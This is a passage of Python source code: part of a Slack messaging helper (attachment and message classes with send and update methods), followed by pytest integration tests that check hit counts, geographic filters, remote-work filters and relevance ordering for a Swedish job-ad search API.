channel_id = list(filter(lambda chan: chan['name'] == channel_name, slack_response['channels']))[0]['id']
except IndexError:
raise ValueError("Channel {} does not exist".format(channel_name))
return channel_id
class SlackAttachment(object):
# Default attachment colors, you can also hex codes.
GOOD = 'good' # Green
WARNING = 'warning' # Yellow
DANGER = 'danger' # Red
default_markdown_fields = ['pretext', 'text', 'fields']
def __init__(
self, fallback: str = '', color: str = GOOD, pretext: Optional[str] = None,
author_name: Optional[str] = None,
author_link: Optional[str] = None, author_icon: Optional[str] = None, title: str = '',
title_link: Optional[str] = None,
text: str = '', fields: Optional[List[Dict]] = None, image_url: Optional[str] = None,
thumb_url: Optional[str] = None,
footer: Optional[str] = None, footer_icon: Optional[str] = None, ts: Optional[datetime] = None,
mrkdwn_in: Optional[List[str]] = None, **kwargs
) -> None:
self.fallback = fallback
self.color = color
self.pretext = pretext
self.author_name = author_name
self.author_link = author_link
self.author_icon = author_icon
self.title = title
self.title_link = title_link
self.text = text
self.fields = fields
self.image_url = image_url
self.thumb_url = thumb_url
self.footer = footer
self.footer_icon = footer_icon
self.ts = ts
if mrkdwn_in is None:
mrkdwn_in = self.default_markdown_fields
self.mrkdwn_in = mrkdwn_in
def __eq__(self, o: object) -> bool:
if type(o) != SlackAttachment:
return False
return self.to_dict() == getattr(o, 'to_dict')()
def to_dict(self) -> Dict[str, Any]:
ret = {
'fallback': self.fallback,
'color': self.color,
'pretext': self.pretext,
'author_name': self.author_name,
'author_link': self.author_link,
'author_icon': self.author_icon,
'title': self.title,
'title_link': self.title_link,
'text': self.text,
'fields': self.fields,
'image_url': self.image_url,
'thumb_url': self.thumb_url,
'footer': self.footer,
'footer_icon': self.footer_icon,
'ts': self.ts.timestamp() if self.ts else None,
'mrkdwn_in': self.mrkdwn_in,
}
return {k: v for k, v in ret.items() if v is not None}
def __repr__(self):
return 'Text: {}'.format(self.text)
class Empty:
pass
class SlackMessage(object):
"""
To use, do SlackMessage(**kwargs).send().
For attachments argument, use above SlackAttachment class and provide as an iterable.
"""
def __eq__(self, o: object) -> bool:
if type(o) != SlackMessage:
return False
for field in ('message', 'channel', 'attachments', 'template'):
if not getattr(self, field) == getattr(o, field, Empty):
return False
return True
def __hash__(self):
return hash(str(self))
def __init__(self, message='', attachments=None, channel=None, template=None) -> None:
if channel is None:
channel = settings.SLACK_CHANNEL
if template is None:
template = settings.SLACK_DEFAULT_TEMPLATE
self.message = message
self._channel = channel
self._attachments = attachments
self.template = template
self._timestamp = None
self._channel_id = None
def __str__(self):
return str({
"channel": self._channel,
"text": self.message,
"attachments": self.attachments,
"template": self.template,
})
def __repr__(self):
return "SlackMessage({})".format(str(self))
@property
def channel(self):
# If we set SLACK_REDIRECT_CHANNEL setting, override channel provided on __init__.
return settings.SLACK_REDIRECT_CHANNEL if settings.SLACK_REDIRECT_CHANNEL else self._channel
@property
def context(self):
return {
"channel": self.channel,
"message": self.message,
}
@property
def attachments(self):
return [attachment.to_dict() for attachment in self._attachments] if self._attachments else None
@property
def rendered_template(self):
return force_text(render_to_string(self.template, self.context).strip())
@property
def id(self):
return self._timestamp
@id.setter
def id(self, value):
self._timestamp = value
@property
def channel_id(self):
if not self._channel_id:
# The id is not needed for regular sending, so we load it only if we use it
self._channel_id = get_channel_id(self.channel)
return self._channel_id
def replace_last_attachment(self, attachment):
        # Replace the last attachment if one exists, otherwise add it as the only attachment.
        try:
            self._attachments[-1] = attachment
        except (IndexError, TypeError):
            # IndexError: attachment list is empty; TypeError: attachments were never set (None).
            # TODO: Or do nothing and let exception go up?
            self.add_attachment(attachment)
def set_attachments(self, attachments):
if type(attachments) in (list, tuple):
self._attachments = attachments
elif type(attachments) == SlackAttachment:
self._attachments = [attachments]
else:
raise ValueError
def add_attachment(self, attachment: SlackAttachment):
if self._attachments:
self._attachments.append(attachment)
else:
self._attachments = [attachment]
def send(self, fail_silently=True):
if settings.SLACK_STORE_MESSAGE:
# Store messages locally during tests
if 'outbox' not in globals():
global outbox
outbox = []
outbox.append(self)
if not settings.SLACK_ENABLED:
if settings.PRINT_SLACK_MESSAGE:
print(self)
return
else:
try:
client = slack.WebClient(token=settings.SLACK_TOKEN)
slack_response = client.chat_postMessage(
channel=self.channel,
text=self.message,
attachments=self.attachments,
as_user=False,
)
if slack_response['ok']:
self.id = slack_response['ts']
else:
raise errors.SlackClientError
except Exception as e:
if not fail_silently:
raise e
return True
def update(self, fail_silently=True):
if self.id:
try:
client = slack.WebClient(token=settings.SLACK_TOKEN)
slack_response = client.chat_update(
channel=self.channel_id,
ts=self.id,
text=self.message,
attachments=self.attachments,
as_user=False
)
if slack_response['ok']:
self.id = slack_response['ts']
else:
raise errors.SlackClientError
except Exception as e:
if not fail_silently:
raise e
else:
if not fail_silently:
raise ValueError("Message has not been sent yet or does not have a valid timestmap")
def retrieve_slack_message(channel: str, ts: str):
if ts is None:
# This is convenient, however the channel must always be present
return None
if settings.SLACK_REDIRECT_CHANNEL:
channel = settings.SLACK_REDIRECT_CHANNEL
channel_id = get_channel_id(channel)
client = slack.WebClient(token=settings.SLACK_TOKEN)
try:
response = client.channels_history(channel=channel_id, latest=ts, inclusive=1, limit=1)
if response['ok']:
message_data = response['messages'][0]
attachments = []
for attachment_data in message_data.get('attachments', []):
attachments.append(
SlackAttachment(**attachment_data)
)
message = SlackMessage(channel=channel, message=message_data['text'], attachments=attachments)
message.id = message_data['ts']
return message
else:
raise ValueError("Message with timestamp {} does not exist in channel {}".format(ts, channel))
except errors.SlackClientError as e:
# Network or auth error. There's nothing we can do.
raise e
```
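As the `SlackMessage` docstring above says, messages are built from `SlackAttachment` objects and sent with `.send()`. A short usage sketch is shown below; the import path, channel name, and texts are placeholders for illustration, not values taken from this repository.

```python
# Illustrative usage of the SlackMessage / SlackAttachment API defined above.
from task.slack_tool import SlackMessage, SlackAttachment  # assumed import path

attachment = SlackAttachment(
    color=SlackAttachment.WARNING,
    title="Nightly test run",
    text="3 of 120 checks differ from the previous run",
)
message = SlackMessage(
    message="Test summary",
    channel="#test-results",      # falls back to settings.SLACK_CHANNEL when omitted
    attachments=[attachment],
)
message.send()                    # stored/printed/posted depending on the SLACK_* settings
message.add_attachment(SlackAttachment(text="Follow-up note"))
message.update()                  # edits the already-sent message via its timestamp
```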
#### File: api_tests/search/test_count.py
```python
import pytest
from tests.test_resources.helper import get_search
@pytest.mark.smoke
@pytest.mark.parametrize("param_expected", [
({}, 1495),
({'q': 'C#'}, 16),
({'q': 'c-körkort'}, 5),
({'q': '.net'}, 17),
({'q': 'ci/cd'}, 8),
({'q': 'erp-system'}, 1),
({'q': 'tcp/ip'}, 2),
({'q': 'cad-verktyg'}, 1),
({'q': 'backend-utvecklare'}, 7),
({'q': 'it-tekniker'}, 9),
({'q': 'sjuksköterska'}, 126),
({'q': 'sjuksköterskor'}, 126),
({'q': 'körkort'}, 327),
({'q': 'distributör'}, 1),
({'q': 'livsmedel'}, 6),
({'q': 'sköterska'}, 3),
({'q': 'undersköterska'}, 41),
({'q': 'lärarutbildning'}, 4),
({'q': 'datasystem'}, 2),
({'q': 'undervisning'}, 54),
({'q': 'försäkring'}, 8),
({'q': 'barnmorska'}, 9),
({'q': 'tandsköterska'}, 6),
({'q': 'kock'}, 12),
({'q': 'stockholm'}, 299),
({'q': 'göteborg'}, 119),
({'q': 'malmö'}, 80),
({'q': 'uppsala'}, 38),
({'q': 'utvecklare'}, 49),
({'q': 'pizzabagare'}, 1),
({'q': 'personlig assistent'}, 51),
({'q': 'förskollärare'}, 22),
({'q': 'python'}, 23),
({'q': 'java'}, 22),
({'q': 'helsingborg'}, 28),
({'q': '<NAME>'}, 15),
({'q': '<NAME>'}, 15),
({'q': '<NAME>'}, 17),
({'q': '<NAME>'}, 9),
({'q': '<NAME>'}, 10),
({'q': 'developer engineer'}, 58),
({'q': 'python'}, 23),
({'q': 'java'}, 22),
({'q': 'java -javautvecklare'}, 19),
({'q': 'java python'}, 37),
({'q': 'java +python'}, 23),
({'q': 'java -python'}, 14),
({'q': 'kock -bagare'}, 12),
({'q': 'pizzabagare'}, 1),
({'q': 'bartender'}, 1),
({'q': 'personlig assistent'}, 51),
({'q': 'personlig assistent +göteborg'}, 6),
({'q': 'personlig assistent -göteborg'}, 45),
({'q': 'utvecklare'}, 49),
({'q': 'förskollärare'}, 22),
({'q': 'sjuksköterska'}, 126),
({'q': 'sjuksköterska -stockholm'}, 117),
({'municipality': ['AvNB_uwa_6n6', 'oYPt_yRA_Smm']}, 359),
({'municipality': 'AvNB_uwa_6n6'}, 285),
({'municipality': 'oYPt_yRA_Smm'}, 74),
({'municipality': 'PVZL_BQT_XtL'}, 117),
({'municipality': 'QiGt_BLu_amP'}, 21),
({'municipality': 'PVZL_BQT_XtL', 'region': 'CifL_Rzy_Mku'}, 527),
({'municipality': 'PVZL_BQT_XtL', 'region': 'CifL_Rzy_Mku', 'country': 'QJgN_Zge_BzJ'}, 531),
({'municipality': 'PVZL_BQT_XtL', 'region': 'CifL_Rzy_Mku', 'country': 'i46j_HmG_v64'}, 1485),
({'region': 'g5Tt_CAV_zBd'}, 34),
({'region': 'CaRE_1nn_cSU'}, 190),
({'region': 'CifL_Rzy_Mku'}, 410),
({'country': 'i46j_HmG_v64'}, 1485),
({'country': 'QJgN_Zge_BzJ'}, 4),
({'occupation-group': '7XXd_4St_nit'}, 9),
({'occupation-group': '5dxv_nVQ_N8o'}, 7),
({'occupation-group': 'BStc_SJh_DKG'}, 10),
({'occupation-group': 'Z8ci_bBE_tmx'}, 105),
({'occupation-field': 'VuuL_7CH_adj'}, 19),
({'occupation-field': 'ScKy_FHB_7wT'}, 21),
({'occupation-field': 'ASGV_zcE_bWf'}, 44),
({'occupation-field': '9puE_nYg_crq'}, 22),
({'q': 'lärare', 'published-after': '2019-01-16T07:29:52'}, 44),
({'q': 'lärare', 'published-after': '2020-12-06T07:29:52'}, 31),
({'q': 'Kundtjänstmedarbetare', 'sort': 'pubdate-asc'}, 21),
({'q': 'Kundtjänstmedarbetare', 'sort': 'pubdate-desc'}, 21),
({'q': 'lärare', 'published-after': '2019-01-16T07:29:52', 'country': 'i46j_HmG_v64', 'sort': 'pubdate-asc'}, 44),
({'q': 'lärare', 'region': ['CifL_Rzy_Mku', 'CaRE_1nn_cSU']}, 14),
({'q': 'lärare', 'region': 'CifL_Rzy_Mku'}, 11),
({'q': 'lärare', 'region': 'CaRE_1nn_cSU'}, 3),
({'q': 'lärare', 'municipality': '8deT_FRF_2SP'}, 1)
])
def test_count_and_print(session, param_expected):
p = param_expected[0]
expected = param_expected[1]
p.update({'limit': '0'})
number_of_hits = get_search(session, params=p)['total']['value']
assert number_of_hits == expected, f"Expected {expected} but got {number_of_hits}"
```
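These tests rely on the `get_search` helper from `tests.test_resources.helper`, which is not included in this dump. A plausible sketch of such a helper is given below, under the assumption that it issues a GET against the `/search` path of `SEARCH_URL` with the session's headers and returns the parsed JSON body.

```python
# Hypothetical sketch of the get_search helper used by the tests above.
# The real implementation lives in tests/test_resources/helper.py (not shown);
# the URL construction is an assumption based on SEARCH_URL and the /search path
# used elsewhere in these tests.
from tests.test_resources.settings import SEARCH_URL


def get_search(session, params):
    response = session.get(f"{SEARCH_URL}/search", params=params)
    response.raise_for_status()
    return response.json()
```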
#### File: api_tests/search/test_different_number_of_results.py
```python
import sys
import pytest
from tests.test_resources.helper import get_search
@pytest.mark.slow
@pytest.mark.parametrize("relevance_threshold", [-1, 0, 0.1, 0.5, 0.8, 0.99, 1, 1.11])
def test_search_relevance_multiple_times(session, relevance_threshold):
"""
This test is created to reproduce a bug where number of hits differ between queries
"""
old_total = sys.maxsize
old_pos = sys.maxsize
failures = []
params = {'q': 'sjuksköterska', 'relevance-threshold': relevance_threshold}
for i in range(10):
result = get_search(session, params)
total = result['total']
pos = result['positions']
        if i > 0:  # comparison to previous result is pointless on first try
            msg = f"relevance-threshold: {relevance_threshold} search {i}: Total: {total}, positions: {pos}"
            if old_total != total or old_pos != pos:
                failures.append(msg)
old_total = total
old_pos = pos
if len(failures) > 0:
print("changes from previous searches:")
for f in failures:
print(f)
assert len(failures) == 0
```
#### File: api_tests/search/test_fetch_platsannons.py
```python
import sys
import os
import requests
import pytest
from tests.test_resources.helper import get_with_path_return_json
from tests.test_resources.settings import SEARCH_URL
@pytest.mark.smoke
@pytest.mark.integration
def test_fetch_ad_by_id(session):
    """
    Get an ad by a request to /search without a query, limiting the result to one ad.
    Use the id of that ad when doing a request to the /ad path.
    Verify that the id of the returned ad is the same as the one used in the request.
    """
    json_response = get_with_path_return_json(session, '/search', params={'limit': '1'})
    ad_id = json_response['hits'][0]['id']
    ad_response = get_with_path_return_json(session, path=f"/ad/{ad_id}", params={})
assert ad_response['id'] == ad_id
assert len(ad_response) == 33
@pytest.mark.integration
def test_fetch_not_found_ad_by_id(session):
ad_id = '823069282306928230692823069282306928230692'
r = session.get(f"{SEARCH_URL}/ad/{ad_id}", params={})
assert r.status_code == requests.codes.not_found
if __name__ == '__main__':
pytest.main([os.path.realpath(__file__), '-svv', '-ra', '-m integration'])
```
#### File: api_tests/search/test_geo_relations.py
```python
import pytest
from tests.test_resources.helper import get_search
from tests.test_resources.concept_ids import concept_ids_geo as geo
@pytest.mark.integration
@pytest.mark.parametrize("city, region, country", [
(geo.stockholm, geo.stockholms_lan, geo.sverige),
(geo.malmo, geo.skane_lan, geo.sverige)
])
def test_search_municipality(session, city, region, country):
"""
Check that parent concept ids (region, country) are correct when searching for a municipality
"""
json_response = get_search(session, {'municipality': city})
hits = json_response['hits']
for hit in hits:
assert hit['workplace_address']['municipality_concept_id'] == city
assert hit['workplace_address']['region_concept_id'] == region
assert hit['workplace_address']['country_concept_id'] == country
@pytest.mark.integration
@pytest.mark.parametrize("cities, region, country", [
([geo.kiruna, geo.lulea, geo.gallivare, geo.kalix, geo.alvsbyn, geo.jokkmokk, geo.overtornea], geo.norrbottens_lan, geo.sverige),
([geo.malmo, geo.lund ,geo.bastad, geo.sjobo, geo.kavlinge, geo.helsingborg, geo.angelholm, geo.hoor, geo.hassleholm], geo.skane_lan,
geo.sverige),
])
def test_search_region(session, cities, region, country):
"""
Check that parent (country) and child (municipality) concept ids are correct when searching for ads in a region
"""
json_response = get_search(session, {'region': region})
hits = json_response['hits']
for hit in hits:
assert hit['workplace_address']['municipality_concept_id'] in cities
assert hit['workplace_address']['region_concept_id'] == region
assert hit['workplace_address']['country_concept_id'] == country
@pytest.mark.integration
@pytest.mark.parametrize("country", [geo.norge, geo.aland_tillhor_finland, geo.malta, geo.schweiz])
def test_search_country_except_sweden(session, country):
"""
Test that countries except Sweden do not have concept ids for municipality and region.
"""
json_response = get_search(session, {'country': country})
hits = json_response['hits']
for hit in hits:
assert hit['workplace_address']['municipality_concept_id'] is None
assert hit['workplace_address']['region_concept_id'] is None
assert hit['workplace_address']['country_concept_id'] == country
@pytest.mark.integration
def test_search_country_sweden(session):
    """
    Test that concept ids for municipality and region exist when searching for ads in Sweden
    """
country = geo.sverige
json_response = get_search(session, {'country': country})
hits = json_response['hits']
for hit in hits:
assert hit['workplace_address']['municipality_concept_id'] is not None
assert hit['workplace_address']['region_concept_id'] is not None
assert hit['workplace_address']['country_concept_id'] == country
```
#### File: api_tests/search/test_query_params.py
```python
import pytest
from tests.test_resources.settings import DAWN_OF_TIME, NUMBER_OF_ADS, current_time_stamp
from tests.test_resources.helper import get_search, compare
from sokannonser.settings import POSITION, POSITION_RADIUS
@pytest.mark.parametrize('params, expected_number_of_hits', [
({'published-before': '2020-12-23T00:00:01'}, NUMBER_OF_ADS),
({'published-before': current_time_stamp}, NUMBER_OF_ADS),
({'published-before': DAWN_OF_TIME}, 0),
({'published-before': '2020-11-01T00:00:01'}, 116),
({'published-before': '2020-11-25T07:29:41'}, 289),
({'published-after': '2020-11-01T00:00:01'}, 1379),
({'published-after': '2020-12-01T00:00:01'}, 1094),
({'published-after': '2020-12-10T00:00:01'}, 739),
({'published-after': '2020-12-22T00:00:01'}, 4),
({'published-after': DAWN_OF_TIME}, NUMBER_OF_ADS),
({'published-after': current_time_stamp}, 0),
({'published-after': '2020-12-15T00:00:01', 'published-before': '2020-12-20T00:00:01'}, 368),
({'published-after': '2020-12-01T00:00:01', 'published-before': '2020-12-10T00:00:01'}, 355),
({'published-after': '2020-12-11T00:00:01', 'published-before': '2020-12-15T00:00:01'}, 153),
({'published-after': current_time_stamp, 'published-before': DAWN_OF_TIME}, 0),
])
def test_query_params_date(session, params, expected_number_of_hits):
"""
Test 'published-before' and 'published-after' query parameters
With a narrower time span, lower number of hits are returned
"""
result = get_search(session, params)
compare(result['total']['value'], expected_number_of_hits)
@pytest.mark.parametrize('params, expected_number_of_hits', [({'experience': 'true'}, 1193),
({'experience': 'false'}, 302),
])
def test_query_params_experience(session, params, expected_number_of_hits):
result = get_search(session, params)
compare(result['total']['value'], expected_number_of_hits)
@pytest.mark.parametrize('params, expected_number_of_hits', [
({'parttime.min': '50'}, 1272),
({'parttime.min': '80'}, 1236),
({'parttime.min': '20'}, 1297),
({'parttime.max': '80'}, 26),
({'parttime.max': '50'}, 10),
({'parttime.max': '20'}, 4)
])
def test_query_params_part_time(session, params, expected_number_of_hits):
"""
Test 'parttime.min' and 'parttime.max' query parameters
"""
result = get_search(session, params)
compare(result['total']['value'], expected_number_of_hits)
@pytest.mark.parametrize('params, expected_number_of_hits', [
({POSITION: '59.3,18.0'}, 27), # stockholm
({POSITION: '59.3,18.0', POSITION_RADIUS: 6}, 250),
({POSITION: '59.3,18.0', POSITION_RADIUS: 10}, 313),
({POSITION: '59.3,18.0', POSITION_RADIUS: 50}, 398),
({POSITION: '59.3,18.0', POSITION_RADIUS: 100}, 495),
({POSITION: '56.9,12.5', POSITION_RADIUS: 100}, 233),
({POSITION: '56.9,12.5', POSITION_RADIUS: 50}, 26),
({POSITION: '56.9,12.5', POSITION_RADIUS: 10}, 7),
({POSITION: '18.0,59.3'}, 0) # lat long reversed
])
def test_query_params_geo_position(session, params, expected_number_of_hits):
"""
    Test the 'position' query parameter along with 'position-radius'.
    With a larger radius, more hits are returned.
"""
result = get_search(session, params)
compare(result['total']['value'], expected_number_of_hits)
@pytest.mark.parametrize('params, expected_number_of_hits',
[
({'employer': 'västra götalandsregionen'}, 17),
({'employer': 'Jobtech'}, 0),
({'employer': 'Region Stockholm'}, 128),
# Todo: this is way too much
({'employer': 'City Gross Sverige AB'}, 1033),
({'employer': 'City Dental i Stockholm AB'}, 1064),
({'employer': 'Premier Service Sverige AB'}, 1035),
({'employer': 'Smartbear Sweden AB'}, 1032),
# probably too much:
({'employer': 'Malmö Universitet'}, 46),
({'employer': 'Göteborgs Universitet'}, 44),
({'employer': '<NAME>'}, 8),
({'employer': '<NAME>'}, 24),
({'employer': '"<NAME>"'}, 24), # quoted string for employer
])
def test_query_params_employer(session, params, expected_number_of_hits):
"""
    This test returns too many hits:
    it will return hits where the company name contains any of the words in the employer name (e.g. 'Sverige').
    It is kept to document current behavior.
"""
result = get_search(session, params)
compare(result['total']['value'], expected_number_of_hits)
```
#### File: api_tests/search/test_remote_work_with_other_params.py
```python
import pytest
from sokannonser.settings import OCCUPATION, OCCUPATION_GROUP, OCCUPATION_FIELD, MUNICIPALITY
from tests.test_resources.concept_ids import occupation, occupation_group, occupation_field, concept_ids_geo as geo
from tests.test_resources.helper import get_total
from tests.test_resources.settings import NUMBER_OF_ADS
from sokannonser.settings import REMOTE, UNSPECIFIED_SWEDEN_WORKPLACE, ABROAD, PUBLISHED_BEFORE, PUBLISHED_AFTER, \
EXPERIENCE_REQUIRED
TEST_DATE = "2020-12-10T23:59:59"
NUMBER_OF_REMOTE_ADS = 11
@pytest.mark.parametrize("params, expected", [
({REMOTE: True, 'q': 'utvecklare'}, 2),
({REMOTE: False, 'q': 'utvecklare'}, 47),
({REMOTE: None, 'q': 'utvecklare'}, 49),
({REMOTE: True, 'q': 'säljare'}, 1),
({REMOTE: False, 'q': 'säljare'}, 59),
({REMOTE: None, 'q': 'säljare'}, 60),
({REMOTE: True, OCCUPATION: occupation.saljkonsulent}, 1),
({REMOTE: None, OCCUPATION: occupation.saljkonsulent}, 2),
({REMOTE: False, OCCUPATION: occupation.saljkonsulent}, 1),
({OCCUPATION: occupation.saljkonsulent}, 2),
({OCCUPATION: occupation.mjukvaruutvecklare}, 20),
({REMOTE: True, OCCUPATION: occupation.mjukvaruutvecklare}, 0),
({REMOTE: False, OCCUPATION: occupation.mjukvaruutvecklare}, 20),
])
def test_remote_occupation(session, params, expected):
"""
AND condition between REMOTE and other params
"""
assert get_total(session, params) == expected
@pytest.mark.parametrize("params, expected", [
({REMOTE: True, OCCUPATION_GROUP: occupation_group.mjukvaru__och_systemutvecklare_m_fl_}, 3),
({REMOTE: None, OCCUPATION_GROUP: occupation_group.mjukvaru__och_systemutvecklare_m_fl_}, 88),
({REMOTE: False, OCCUPATION_GROUP: occupation_group.mjukvaru__och_systemutvecklare_m_fl_}, 85),
({REMOTE: True, OCCUPATION_GROUP: occupation_group.telefonforsaljare_m_fl_}, 0),
({REMOTE: None, OCCUPATION_GROUP: occupation_group.telefonforsaljare_m_fl_}, 24),
({REMOTE: True, OCCUPATION_GROUP: occupation_group.foretagssaljare}, 2),
({REMOTE: None, OCCUPATION_GROUP: occupation_group.foretagssaljare}, 66),
])
def test_remote_occupation_group(session, params, expected):
"""
AND condition between REMOTE and other params
"""
assert get_total(session, params) == expected
@pytest.mark.parametrize("params, expected", [
({REMOTE: True, OCCUPATION_FIELD: occupation_field.data_it}, 3),
({REMOTE: None, OCCUPATION_FIELD: occupation_field.data_it}, 156),
({REMOTE: True, OCCUPATION_FIELD: occupation_field.forsaljning__inkop__marknadsforing}, 3),
({REMOTE: None, OCCUPATION_FIELD: occupation_field.forsaljning__inkop__marknadsforing}, 188),
({REMOTE: False, OCCUPATION_FIELD: occupation_field.forsaljning__inkop__marknadsforing}, 185),
])
def test_remote_occupation_field(session, params, expected):
"""
AND condition between REMOTE and other params
"""
assert get_total(session, params) == expected
@pytest.mark.parametrize("params, expected", [
({'q': 'Stockholm'}, 299),
({REMOTE: True, 'q': 'Stockholm'}, 4),
({REMOTE: False, 'q': 'Stockholm'}, 295),
({MUNICIPALITY: geo.stockholm}, 285),
({REMOTE: True, MUNICIPALITY: geo.stockholm}, 3),
({REMOTE: False, MUNICIPALITY: geo.stockholm}, 282),
])
def test_remote_municipality(session, params, expected):
"""
AND condition between REMOTE and other params
"""
assert get_total(session, params) == expected
@pytest.mark.parametrize("params, expected", [
({'q': 'Stockholms Län'}, 410),
({REMOTE: True, 'q': 'Stockholms Län'}, 3),
({REMOTE: False, 'q': 'Stockholms Län'}, 407),
({'region': geo.stockholms_lan}, 410),
({REMOTE: True, 'region': geo.stockholms_lan}, 3),
({REMOTE: False, 'region': geo.stockholms_lan}, 407),
({REMOTE: None, 'region': geo.vastra_gotalands_lan}, 220),
({REMOTE: True, 'region': geo.vastra_gotalands_lan}, 1),
({REMOTE: False, 'region': geo.vastra_gotalands_lan}, 219),
({'region': geo.vastra_gotalands_lan, 'q': 'säljare'}, 9),
({REMOTE: False, 'region': geo.vastra_gotalands_lan, 'q': 'säljare'}, 9),
({REMOTE: True, 'region': geo.vastra_gotalands_lan, 'q': 'säljare'}, 0),
])
def test_remote_region(session, params, expected):
"""
AND condition between REMOTE and other params
"""
assert get_total(session, params) == expected
@pytest.mark.parametrize("params, expected", [
({PUBLISHED_AFTER: TEST_DATE}, 674),
({REMOTE: True, PUBLISHED_AFTER: TEST_DATE}, 6),
({PUBLISHED_BEFORE: TEST_DATE}, 821),
({REMOTE: True, PUBLISHED_BEFORE: TEST_DATE}, 5)
])
def test_remote_publish_date(session, params, expected):
"""
AND condition between REMOTE and other params
"""
assert get_total(session, params) == expected
@pytest.mark.parametrize("params, expected", [
({ABROAD: True}, 10),
({ABROAD: False}, NUMBER_OF_ADS),
({REMOTE: True, ABROAD: True}, 0),
({REMOTE: True, ABROAD: False}, NUMBER_OF_REMOTE_ADS), # abroad False does nothing
])
def test_abroad(session, params, expected):
"""
AND condition between REMOTE and other params
"""
assert get_total(session, params) == expected
@pytest.mark.parametrize("params, expected", [
({UNSPECIFIED_SWEDEN_WORKPLACE: True}, 46),
({UNSPECIFIED_SWEDEN_WORKPLACE: False}, NUMBER_OF_ADS),
({REMOTE: True, UNSPECIFIED_SWEDEN_WORKPLACE: True}, 3),
({REMOTE: True, UNSPECIFIED_SWEDEN_WORKPLACE: False}, NUMBER_OF_REMOTE_ADS)
])
def test_unspecified_workplace(session, params, expected):
"""
AND condition between REMOTE and other params
"""
assert get_total(session, params) == expected
@pytest.mark.parametrize('params, expected', [
({EXPERIENCE_REQUIRED: True}, 1193),
({EXPERIENCE_REQUIRED: False}, 302),
({REMOTE: True, EXPERIENCE_REQUIRED: True}, 10),
({REMOTE: False, EXPERIENCE_REQUIRED: True}, 1183),
({REMOTE: True, EXPERIENCE_REQUIRED: False}, 1),
({REMOTE: False, EXPERIENCE_REQUIRED: False}, 301)
])
def test_experience(session, params, expected):
"""
AND condition between REMOTE and other params
"""
assert get_total(session, params) == expected
@pytest.mark.parametrize("params, expected", [
({REMOTE: True, 'q': '-Stockholm'}, 7),
({REMOTE: True, MUNICIPALITY: f"-{geo.stockholm}"}, 8),
({REMOTE: True, 'region': f"-{geo.stockholms_lan}"}, 8),
({REMOTE: True, 'region': f"-{geo.vastra_gotalands_lan}"}, 10),
({REMOTE: True, 'region': f"-{geo.skane_lan}"}, 10),
({REMOTE: True, 'region': f"-{geo.norrbottens_lan}"}, 10),
])
def test_remote_negative_geography(session, params, expected):
"""
Negative geographical parameters
AND condition between REMOTE and other params
"""
assert get_total(session, params) == expected
def test_combination_municipality(session):
"""
    numbers for REMOTE True + REMOTE False should add up to the numbers when not using REMOTE
AND condition between REMOTE and other params
"""
number_region = get_total(session, {'municipality': geo.stockholm})
number_remote = get_total(session, {REMOTE: True, 'municipality': geo.stockholm})
number_not_remote = get_total(session, {REMOTE: False, 'municipality': geo.stockholm})
assert number_remote + number_not_remote == number_region
def test_combination_region(session):
"""
    numbers for REMOTE True + REMOTE False should add up to the numbers when not using REMOTE
AND condition between REMOTE and other params
"""
number_region = get_total(session, {'region': geo.stockholms_lan})
number_remote = get_total(session, {REMOTE: True, 'region': geo.stockholms_lan})
number_not_remote = get_total(session, {REMOTE: False, 'region': geo.stockholms_lan})
assert number_remote + number_not_remote == number_region
@pytest.mark.parametrize("param, expected", [
({REMOTE: False, REMOTE: True}, NUMBER_OF_REMOTE_ADS),
({REMOTE: True, REMOTE: False}, (NUMBER_OF_ADS - NUMBER_OF_REMOTE_ADS)),
({REMOTE: True, REMOTE: False, REMOTE: True}, NUMBER_OF_REMOTE_ADS)
])
def test_duplicate_remote_param(session, param, expected):
"""
with duplicated params, value of last param is used
"""
assert get_total(session, params=param) == expected
```
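A note on `test_duplicate_remote_param` above: because the duplicated keys live in a Python dict literal, they collapse before the request is ever sent, so the test effectively documents Python's last-key-wins semantics rather than server-side handling of repeated query parameters. A tiny illustration (the string value of `REMOTE` below is a placeholder; the real constant comes from `sokannonser.settings`):

```python
# Duplicate keys in a dict literal collapse to the last value before the request is built.
REMOTE = 'remote'  # placeholder for sokannonser.settings.REMOTE
params = {REMOTE: False, REMOTE: True}
assert params == {REMOTE: True}  # only the last value survives
assert len(params) == 1
```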
#### File: api_tests/search/test_search_logic.py
```python
import sys
import json
import pytest
from tests.test_resources.concept_ids import concept_ids_geo as geo
from tests.test_resources.helper import get_search, get_search_check_number_of_results, check_freetext_concepts
from tests.test_resources.settings import TEST_USE_STATIC_DATA
@pytest.mark.skipif(not TEST_USE_STATIC_DATA, reason="depends on a fixed set of ads")
@pytest.mark.integration
@pytest.mark.parametrize("query, municipality, code, municipality_concept_id, expected_number_of_hits", [
('bagare stockholm', 'Stockholm', '0180', geo.stockholm, 0),
('lärare stockholm', 'Stockholm', '0180', geo.stockholm, 11),
('lärare göteborg', 'Göteborg', '1480', geo.goteborg, 6),
])
def test_freetext_work_and_location_details(session, query, municipality, code, municipality_concept_id,
expected_number_of_hits):
params = {'q': query, 'limit': '100'}
response = get_search_check_number_of_results(session, expected_number_of_hits, params)
response_json = json.loads(response.content.decode('utf8'))
for ad in response_json['hits']:
print(ad['id'])
assert ad['workplace_address']['municipality'] == municipality
assert ad['workplace_address']['municipality_code'] == code
assert ad['workplace_address']['municipality_concept_id'] == municipality_concept_id
@pytest.mark.skipif(not TEST_USE_STATIC_DATA, reason="depends on a fixed set of ads")
@pytest.mark.parametrize("query, expected_ids_and_relevance", [
('sjuksköterska läkare Stockholm Göteborg', [
('24429701', 1.0),
('24402238', 1.0),
('24398617', 0.8741737070842681),
('24312980', 0.8741737070842681),
('24418102', 0.7045549889157827),
('24416155', 0.7045549889157827),
('24425309', 0.5787286960000507),
('24420444', 0.5787286960000507),
('24403543', 0.5787286960000507),
('24403071', 0.5787286960000507),
('24395432', 0.5787286960000507),
('24369160', 0.5787286960000507),
('24225167', 0.5787286960000507),
('24202976', 0.5787286960000507),
('24420717', 0.428879288175419),
('24408926', 0.25384773681085276)
])])
def test_freetext_two_work_and_two_locations_check_order(session, query, expected_ids_and_relevance):
"""
    Tests that the sorting order of hits is as expected and that the relevance values have not changed.
    This documents current behavior.
"""
params = {'q': query, 'limit': '100'}
response_json = get_search(session, params)
old_relevance = 1
for index, hit in enumerate(response_json['hits']):
relevance = hit['relevance']
        assert old_relevance >= relevance  # check that results are presented in descending relevance order
assert hit['id'] == expected_ids_and_relevance[index][0]
assert hit['relevance'] == expected_ids_and_relevance[index][1], hit['id']
old_relevance = relevance
@pytest.mark.parametrize("query, top_id, expected_number_of_hits", [
('bagare kock Stockholm Göteborg', '24274093', 1),
